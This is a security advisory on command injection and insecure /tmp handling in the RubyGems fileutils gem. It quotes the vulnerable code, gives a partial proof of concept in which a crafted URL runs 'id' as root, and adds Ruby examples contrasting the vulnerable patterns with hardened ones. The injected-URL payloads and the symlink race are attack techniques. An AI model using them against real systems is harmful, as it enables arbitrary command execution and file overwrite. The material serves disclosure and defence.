RubyGems fileutils 'file_utils.rb' Remote Command Execution Vulnerability

Source: Internet
Author: User
Tags: file handling

Affected Systems:
Rubygems Fileutils
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58223

The fileutils gem (distinct from the Ruby standard library's FileUtils module, whose name it reuses) is a set of utility classes that extract metadata from different file types by shelling out to external tools such as CutyCapt and OpenOffice.

The gem builds its shell command lines by string interpolation and runs them with backticks. The URL handed to CutyCapt (and the arguments of the OpenOffice/python conversion command) are not escaped, so whoever controls that input can inject shell metacharacters such as ';' or '$(...)' and run arbitrary commands with the privileges of the process using the gem. Separately, the gem creates its working directories and temporary files under /tmp with predictable names after a non-atomic existence check, so a local attacker can plant a symlink at the predicted name and have the gem overwrite an arbitrary file. The command injection is reachable remotely wherever an application passes user-supplied URLs to the gem; the /tmp issue is exploitable locally.

<* Source: Larry W. Cashdollar (lwc@vapid.dhs.org)

Link: http://packetstormsecurity.com/files/120579/fileutilsgem-exec.txt
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

Possible remote command execution and insecure file handling in /tmp.
2/23/2013

http://rubygems.org/gems/fileutils

"A set of utility classes to extract meta data from different file types."

Handles files insecurely in /tmp: a directory is created for each file extension, say 'zip', and files are manipulated there. Because the directory name is predictable and creation is not atomic, this directory can be hijacked and its contents manipulated by a malicious local user.

In./lib/file_utils.rb

    def zip(target, *sources)
      targetdir = "#{FileUtils::Config.tmp_dir}/zip"
      id = 1
      while File.exists?(targetdir)
        targetdir = "#{FileUtils::Config.tmp_dir}/zip#{id}"
        id += 1
      end
      FileUtils.mkdir(targetdir)
      # ... rest of the method not quoted in the advisory
    end

where Config.tmp_dir is /tmp:

In./lib/file_utils/config. rb

    def self.tmp_dir
      @tmp_dir ||= '/tmp'
    end

Remote command execution:

file_utils.rb does not sanitize the URL it passes to CutyCapt for execution. Because the command line is built by interpolating the URL into a string that is then run through the shell, a URL containing shell metacharacters, say a ';' followed by a command, lets a remote attacker execute that command on the client's system if the client can be enticed to open a URL such as:

Need to test URL encoding; not sure if this is valid.

http://bla.net.org; id>/tmp/o; -> http://tinyurl.com/a5scxzz

    def capture(url, target)
      command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}")
      `#{command}`
    end

Partial PoC if the client is tricked into using a malicious URL (the shell stops at the injected ';', runs id, and only then chokes on the remaining --out argument):

    irb(main):001:0> `xvfb-run --server-args="-screen 768x24" ./CutyCapt --url=http://www.example.org; id>/tmp/foo; --out=/tmp/tempf`
    xvfb-run: error: Xvfb failed to start
    sh: 1: --out=/tmp/tempf: not found
    => ""
    irb(main):002:0>

    root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# ls -l /tmp/foo
    -rw-r--r-- 1 root root 39 Feb 27 /tmp/foo
    root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# cat /tmp/foo
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#
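The following Ruby is an added example written for this page; it is not code from the fileutils gem or from the advisory. It swaps CutyCapt for printf as a stand-in so the behaviour can be observed without Xvfb or CutyCapt installed, and uses a constructed payload, http://www.example.org/$(id), chosen because it is a syntactically valid URL: a URI.parse allow-list accepts it, yet the shell still expands $(id). It shows the gem's vulnerable shape (one interpolated string handed to /bin/sh), the hardened shape (argv elements passed to Open3 with no shell, after the allow-list check), and Shellwords.shelljoin for the case where a single shell string genuinely has to be built. The names capture_vulnerable, capture_hardened, safe_url? and capture_command_string are this example's own.

```ruby
require 'open3'
require 'uri'
require 'shellwords'

# Stand-in for "xvfb-run ... CutyCapt": printf just echoes its argument back,
# so the injection is visible without Xvfb or CutyCapt (constructed for this
# example; the real gem invokes CutyCapt).
STAND_IN = "printf '%s\\n'"

# Vulnerable shape, mirroring the gem's capture method: the URL is interpolated
# into one string, and a single-string command goes through /bin/sh -c, which
# honours ';', '$(...)', backticks, '|' and friends.
def capture_vulnerable(url)
  command = "#{STAND_IN} --url=#{url}"
  stdout, _stderr, _status = Open3.capture3(command)
  stdout
end

# Allow-list check on the URL. Necessary (rejects file://, garbage, spaces)
# but NOT sufficient on its own: '$', '(', ')', ';', '&' and '`' are legal URI
# characters, so "http://www.example.org/$(id)" passes and still injects if
# the string ever reaches a shell.
def safe_url?(url)
  uri = URI.parse(url)
  %w[http https].include?(uri.scheme) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false
end

# Hardened shape: validate, then pass argv as separate elements. No shell is
# involved, so metacharacters in the URL are just bytes inside one argument.
def capture_hardened(url)
  raise ArgumentError, "refusing URL #{url.inspect}" unless safe_url?(url)
  stdout, _stderr, _status = Open3.capture3("printf", "%s\n", "--url=#{url}")
  stdout
end

# If a single shell string really is required (for instance to hand to an
# xvfb-run wrapper the way Config::Xvfb.command does), build it with
# Shellwords so every interpolated piece is escaped.
def capture_command_string(url, target)
  ["CutyCapt", "--min-width=1024", "--min-height=768",
   "--url=#{url}", "--out=#{target}"].shelljoin
end

if __FILE__ == $0
  # Constructed payload; same idea as the advisory's "; id>/tmp/foo;" but
  # valid as a URL, so it survives URI.parse.
  payload = "http://www.example.org/$(id)"
  puts "URI.parse accepts the payload: #{safe_url?(payload)}"
  puts "vulnerable : #{capture_vulnerable(payload)}"
  puts "hardened   : #{capture_hardened(payload)}"
  puts "escaped    : #{capture_command_string('http://www.example.org; id>/tmp/foo;', '/tmp/tempf')}"
end
```

The design point is that the fix is not a better filter on the URL but never letting the URL touch a shell: argv passed to Open3/Process.spawn is exec'd directly, so the question of which characters are dangerous disappears. The same change applies to every backtick invocation in the gem that interpolates caller data, including the OpenOffice/python conversion command quoted further down.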

Michael Scherer of RedHat.com found other issues during a discussion about the above issues I found:

In fact, there is the same problem in another file:
    result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb (a quick command line to type Ruby snippets), and yes, using funky chars results in funky results.

There is another issue in:

    # Generates a temp filepath for the given extension
    def temp(extension)
      path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
      id = 1
      while File.exists?(path)
        path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
        id += 1
      end
      path
    end

Since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file.

Thanks to vl4dz and Michael.

Larry W. Cashdollar @_larry0
http://vapid.dhs.org
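An added example, not part of the advisory or of the gem, showing why the predictable names under /tmp matter and what the atomic alternatives look like. It reproduces the temp(extension) naming pattern inside a throwaway directory (a constructed scenario; the real /tmp is not touched), plants a symlink at the predicted name the way a local attacker would, and contrasts a naive File.write with an open using O_CREAT|O_EXCL|O_NOFOLLOW. Dir.mktmpdir stands in for the gem's "/tmp/zip", "/tmp/zip1", ... mkdir loop. The function names predictable_temp_path, naive_write, exclusive_write, private_workdir_mode and simulate_symlink_race are this example's own.

```ruby
require 'tmpdir'

# Naive path generation in the shape of the gem's temp(extension): the name is
# predictable, and the exist? check is a separate step from the later open, so
# an attacker can plant a symlink at that name in between.
def predictable_temp_path(tmp_dir, extension)
  path = "#{tmp_dir}/tmp.#{extension}"
  id = 1
  while File.exist?(path)
    path = "#{tmp_dir}/tmp.#{id}.#{extension}"
    id += 1
  end
  path
end

# Naive writer: opens whatever the path resolves to at write time, following
# symlinks, so a planted link redirects the write to the attacker's target.
def naive_write(path, data)
  File.write(path, data)
end

# O_NOFOLLOW where the platform has it (Linux does); 0 is a no-op fallback.
NOFOLLOW = File.const_defined?(:NOFOLLOW) ? File::NOFOLLOW : 0

# Hardened writer: O_CREAT|O_EXCL makes creation atomic and fails with EEXIST if
# any entry, including a symlink, already exists; O_NOFOLLOW additionally refuses
# to traverse a symlink. Either way the attacker's link is never followed.
def exclusive_write(path, data)
  File.open(path, File::WRONLY | File::CREAT | File::EXCL | NOFOLLOW, 0600) do |f|
    f.write(data)
  end
end

# Hardened replacement for the gem's mkdir loop: mkdtemp(3) picks an
# unguessable name and creates it atomically with mode 0700, so nobody else can
# pre-create or enter it. Returns the permission bits as seen inside the block.
def private_workdir_mode(prefix = "fileutils-zip")
  Dir.mktmpdir(prefix) { |dir| File.stat(dir).mode & 0777 }
end

# Constructed race scenario in a throwaway directory: the attacker plants a
# symlink at the name the victim is about to use, pointing at a file the victim
# must not touch. Returns what each writer did to the victim file.
def simulate_symlink_race
  Dir.mktmpdir("race") do |dir|
    victim = File.join(dir, "important.txt")
    File.write(victim, "original")
    planted = predictable_temp_path(dir, "zip")   # attacker computes the same name
    File.symlink(victim, planted)                  # ...and links it to the victim
    naive_write(planted, "clobbered")              # naive code writes through the link
    after_naive = File.read(victim)
    hardened_error = begin
      exclusive_write(planted, "clobbered again")  # hardened code refuses
      nil
    rescue SystemCallError => e
      e.class
    end
    { after_naive: after_naive, hardened_error: hardened_error,
      after_hardened: File.read(victim) }
  end
end

if __FILE__ == $0
  p simulate_symlink_race
  printf "mktmpdir mode: %o\n", private_workdir_mode
end
```

Checking File.exist? or even File.symlink? before the write does not help, because the attacker can create the link after the check and before the open; only an open that both creates and refuses-if-present in a single system call closes the window, and a private mode-0700 working directory removes the shared-namespace problem altogether.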

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Rubygems
--------
At the time of writing the vendor has not released a patch or an upgraded version. Users of the gem are advised to watch the vendor's page for a fixed release. Until then, do not pass untrusted URLs or file names to the gem, and run it with a private, mode-0700 temporary directory rather than the shared /tmp.

https://rubygems.org/gems/fileutils
